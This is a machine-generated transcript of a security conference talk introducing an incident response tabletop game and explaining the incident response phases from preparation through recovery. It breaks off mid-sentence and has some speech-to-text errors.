AJLeece

foreign welcome everyone thanks for coming besides 2022 how many of you in here this is your first conference and yeah in general for security conference yeah cool welcome uh so I Am AJ I am the managing director of syntax security our mission is quite simple we play games and we have fun and in the same vein we'll teach you something about security along the way I have my uh developer here Nathan who has done an amazing job taking my initial Prototype game posing all of the AJ alphabet and then making it actually a whole lot better than it originally was uh so today's session we're a little bit condensed for time so for what it's worth the true gain really plays out over a couple of hours it gives us time to sit talk and explore the scenario really don't have that kind of luxury today because there's just so much amazing content out there for all of you to get to I don't want to hold you up any longer than I really have to so I appreciate your attention and your effort we're going to get through everything just nice and tickety-boo we actually have a whole new build of the game to show you today so you're getting the first exclusive look of the latest version of incidents and accidents I call it version four because the other versions were just so far behind will be built that this is just really something incredible but before we get to that we have some Death by PowerPoint because what's a presentation without a little PowerPoint so go ahead so today's agenda I'm going to talk a little bit about incident response because I want you all playing from the same sheet of music so we're going to cover the six main outcomes from incident response really how the business really needs to interact with incident responders what they need to consider as they're building this uh plan and they go towards so we're going to be talking a little bit about that then we're going to get into the gameplay so like I mentioned before we're a little condensed on time so we can't get a full proper game because there's just too much cool stuff in here to show you so we're going to run it a little more like a game show and less like a Hands-On so traditionally in a smaller group we'd have a bit more of a Hands-On thing this game does scale well to that size but again just for the the shortage of time I want to make sure we have a chance to explore a little everything so we're going to do a little bit more game show uh and a little bit less Dungeons and Dragons it's still going to be good I promise if not well um you know don't tell anyone so a little about me AJ I got some letters inside my name some of them are probably set to expire soon enough uh Nathan here is actually a former student of mine uh when I was teaching back in the day and is now a world-class developer who's helping me put this all together overall I'm an information security geek there really isn't a lot about information security that I don't find interesting to some extent yeah except maybe risk and compliance but I did my time in those in those those areas in the paperwork is vital to Security Programs uh the compliance folks they play a really really excellent role in the business so in the game sessions the the full game sessions there is a role for compliance to play we do bring them to the incident response ideas because they have such a vital place to be within other than that super into other things within information security and super Avid Gamers so if any of you like to play if you'd like to have a good time uh you know hit me up later we'll uh find something to do and we'll enjoy it so why are we here simple we're just here to have fun right like there's so many good presentations out there so much good content and we're just here to have a good time we're here to have fun learn explore Network and socialize all these people that you're sitting here today we're all attached to the industry in some way whether it's your first security conference maybe you're here for your multitudes of security conferences there's a lot of people in this room all of whom have very interesting opportunities this is an opportunity for you to kind of sit and chat and network with them as well so uh we're we're going to be having a good time so today we're going to have an incident and in most cases in a business you're never going to get a heads up that you're about to have your Friday ruined and your Saturday ruined and maybe the next month or two ruined with postmortem meetings uh so today huzzah because we're having fun at a conference yeah something bad is going to happen to a company fortunately none of us have a real strong stake in it uh nobody has any shares of it or anything like that so the impact is completely fictional uh but the scenario is real everything that is conceived here that we're about to talk about today was born out of this is how and could happen and the logic all goes up so again we're don't worry about it if you're feeling a little bit like oh the impact don't worry about it there is no real business no actual ones and zeros were harmed in the making of this but our goal is simple we want to resolve the incident and get the business back online so there are some session considerations again just because we have a shortage of time we've stripped out a whole ton of cool stuff it's really cool I can't wait to tell you about it at the end um as with new technology though it is this is beta this is a beta test you're all beta testing this today so welcome thank you very much for the effort uh but welcome to the bleeding edge so sometimes things go horribly wrong uh we're not anticipating any of those months today we went ahead and swatched most of them when we were working through this so I didn't have a music that would have been a good idea um as with all of my sessions questions are absolutely encouraged so you're under no obligation to censor yourself when it comes to questions about this the only bad question is the one that you didn't actually ask right so no matter what somebody somewhere is going to find some use of it please go ahead ask any questions that you have we can pause we can move on if we have to come back to them later on no worries I'm around we'll make it work so let's talk about incident response it is a never-ending story most of the time you are putting out fires uh it is usually a bit harrowing and a little bit stressful so here's some Basics that you can keep in the back of your head no matter what role you play in an incident response team if you're even a part of it there is something here that you'll find useful I promise so first let's let's get some common definition going so we have events and we'll get to the next definition that matters so an event is basically just information that's relevant to something within the business something within information security so events happen all the time believe it or not some of you have probably looked at a bunch of these and maybe have forgotten uh if you're brand new to this information security space turn on logging sometime and just see how noisy it gets and just watch that all flood and take down your hard drives you see these so do so carefully um but with events we lock a lot of the context around what happened so the event itself is just simply an indicator of something happen we don't really know why or how or if it's good bad or even so for that we have to look towards some other definition so when we talk about incidents incidents really dovetail into this intent to do harm malicious activity an event that correlates to some kind of malice or some kind of uh bad actor doing something malicious within our midst uh in short if you click it the secret ingredient is fine that's really what it is it's it's basically somebody is looking to do something malicious on our Network and the events tell the story of how that happens so for the audience a failed logging attempt is that an incident or an event an event yeah absolutely next what about a malware outbreak yeah you bet what about an antivirus service that's been stopped on a host oh I'll take a poll right because we lack the context around it administrators will stop AV services to install software all the time monitoring tools and malware actually share a lot of the similar taxonomy if a monitoring tool is grabbing your CPUs Services OS information logged on users all that really cool stuff and sending it to a command and control server or rather their Central server replace command and control with their Central server but you know when you think about it malware acts differently right it would have similarly so it really doesn't what about a ddus yeah that's it right that's there's no no legitimate use for that although funny story I remember uh when Michael Jackson passed apparently a lot of the news websites were experiencing a massive flood of traffic that started to look like DDOS attacks just purely based off of how breaking that news was so I guess it's important to really analyze the traffic the headers the information that's coming into your network so that you can define whether or not you're truly under attack or just getting some kind of hug to death what about a large upload to an unknown location okay who says incident one two three therefore okay and event yeah it's an event because we lack the context around why that upload happened large uploads to Dropbox happen all the time attackers will also leverage those same services for what that's worth they're free they're available and by and large they're approved within the business so a large upload to an unloaded unknown location should likely be investigated as a potential problem because you want to understand the data that went out combined with where it went to who put it up there and in what capacity okay everyone come on in all right so when we're talking about incident response we have a few desired outcomes that we want to achieve anywhere within the business wherever we can so preparation is obviously the very first step preparation is mandatory when it comes to incident response if you're an IR team or you're a sock manager or you're some kind of security professional one of the things you kind of always want to do is just sort of be prepared for the nest incident we'll cover how so make sure that you are ready prepared and able to action any of this as it comes out because again nobody's going to warn you that an incident is inbound unless maybe you're getting a red team exercise so make sure that you're adequately prepared from there nope go back from there uh you want to identify all the compromised assets so this is called getting the scope of your compromise you want to understand all of the potentially affected assets within your environment because you have to move to contain them away from the rest of the network how you contain them is entirely up to you we'll cover that in just a minute but realistically what you do is you find all of the problem areas of the incident you go ahead and isolate them you then eradicate the threats that you found in the process of doing your investigation and you recover the assets to bring the business back online and then you spend a whole pile of time in meetings with c-level Executives trying to discuss how to prevent this further hopefully some of that advice gets taken into consideration but at the very least you learned something along the way hopefully to avoid this in the future so we talk preparation you'll never rise to the occasion anybody who says they will they certainly won't reason being is you'll only fall to your lowest level of preparation so if all of your tools are missing if you haven't worked on some of this stuff in a while uh if you are new to it and you haven't practiced whatever that preparation looks like it's important to keep that going as best you can because when an incident hits time is really critical and the more that you can do to move this along in a way that doesn't really impact the business too much the better it is for you so all of that preparation shows up so make sure that your tools are sanitized that goes right hand in hand with your forensics media if you're fortunate enough to have in-house forensics they should already be handling this but it's not a guarantee so it is something to just kind of follow up with whoever's in charge of that if it happens to be you if you're doing some of that because that becomes really important as part of your evidence gallery uh and then of course make sure you have a clean shirt and maybe you've gotten a little bit of sleep uh incidents take a while incidents I remember locking myself in an office once upon a time ago for 12 14 hours working an incident at a client with ransomware and uh it started to smell like a petting zoo pretty quick so definitely going with it was really good um this is actually a really important one I want to highlight this one specifically documentation available in multiple places how many of you have a documentation repository inside your business that's actually a bigger number than I thought yeah cool so how many of you have that documentation replicated in different spaces in the event of that Central repository somehow down yeah that's that's more like it so having that that resilient documentation because your standard operating procedures in an incident those are what people are going to be following and those are what everyone's going to defer back to when it comes to your training and your development so make sure that your documentation is available in different places wherever you can make sure it's up to date in both directions whatever that looks like within the business make sure that you're following them so with regards to Identity notification it's quite simple you're going to get it from many sources so the initial Genesis and event can come from a phone call from somebody through help desk hey I went to this web page and I'm starting to get all these weird redirects and now the request won't complete uh hey I went to go install this tool and the antivirus software turned itself off and now I have this problem so you're going to get all these notifications from all these different directions it's important to be aware of where those can come from and keep an eye on them for any of the sock analysts in the room identification sources are primarily alerts and they're very noisy and they're tedious to follow up so I do appreciate the work that we do but when you're looking through any of those alerts try and correlate some of them to some of the others if you're seeing some activity on one host and some other activity on another host but it kind of looks like it might be connected don't be afraid to pull on that thread because that really goes a long way but the long and short of it is you're trying to catalog the entire scope of the problem and the reason for that is that you can document where the entire scope is because the one thing with incidents is you're going to run into a lot of panic you're going to run into a lot of everybody wants to set their hair on fire and try and resolve the problem as quickly as possible finding all of the mess and documenting it in a way that's clear and ambiguous flexible within your incident response plan and available to your incident responders is going to make a big difference whenever you're trying to get this work done especially so once you've found everything we now move to containment so this is where we isolate the assets away from the network so there's a few ways to do it each business is different some people straight up can plug unplug the network cable and Life's good others have to create some kind of special Network routing in order to make it so these can't phone out to the internet but anything that you can do to isolate these devices from your network is vital but you still need to be able to get in and manage them because some part of your investigation process is going to require you to probably put some hands on a machine in some way shape or form so whether that's through forensics whether that's through some kind of console where you're going through and Mining some of this information depending on the asset we might just move right to eradication recovery where you just pave it for more of it and move on it's all dependent on the business but whatever you do to contain your assets is really really important one thing though you want to avoid powering down any assets if you possibly can because a lot of the attacker surface lives in memory so you can lose that rent if you power it down and don't you know it doesn't come back on its own so if you can avoid avoid powering it off that's great sometimes it's easier said than done in a lot of cases you might get an incident right I panicked and shut down the computer okay well so in that case you can either move to forensics if you have skills in-house or you can start to work on it through some other way but just isolate it from the network so eradication this is where you're getting rid of the threat to to the organization so because you contain the threat you you now have isolated all of the potential backlash that can come from it so if your attacker is still latent in the network they might go hey I'm still here and they'll thrash your backups or they'll make the damage worse maybe they'll leak the data whatever you can do to to minimize that is always useful so with regards to eradication you're closing any network back doors you have one that gets missed quite frequently are automated tasks and scheduled jobs cron jobs uh schedule tasks in Windows any automated scripts that might be there so you want to look for some of those just because it looks like it might be legitimate doesn't mean it actually is so you think about something like a scheduled task that's set to upload a copy of a database to Dropbox I don't know why you'd ever configure that from a business standpoint but let's say that exists you know don't ignore those kinds of things because that might be somebody put that there as a temporary solution and now the attacker is abusing it or the attacker put that there for you and they're continuing to leverage that so always look for the automated jobs very very easy um any firewall rules it's it's not common that firewalls are going to get popped I mean they're they're usually pretty robust um but if somebody put some custom firewall rules in there that you can't track down make sure that you are what are these for let's power them down and see what it does to the business that's a tough conversation to have in a boardroom by the way so you kind of have to come ready to go with we don't know which rules are ours and which ones somebody else might have put there unauthorized so you might have a bit of a boardroom battle in your midst on that so remove any unauthorized firewall rules if they exist especially if they're too permissive that's going to go a long way and then recovery this is the best part you get to bring everything back online um apparently that didn't show up but this is just make sure everything looks good sorry um but basically when it comes to the recovery phase this is where you're bringing everything back online one important note that data custodians have to or sorry the data owners have to sign off on the data and the service being properly configured and ready to go before you bring it back online now in most organizations they might defer to the IT team who are usually the data custodians but let's say you have a credit card data breach and the finance department is the one who has to signs off on that make sure that they get a chance to look at the everything that's in there verify that all the apps and everything attached are working as expected the data has the Integrity it needs before you bring it back online and roll it back into the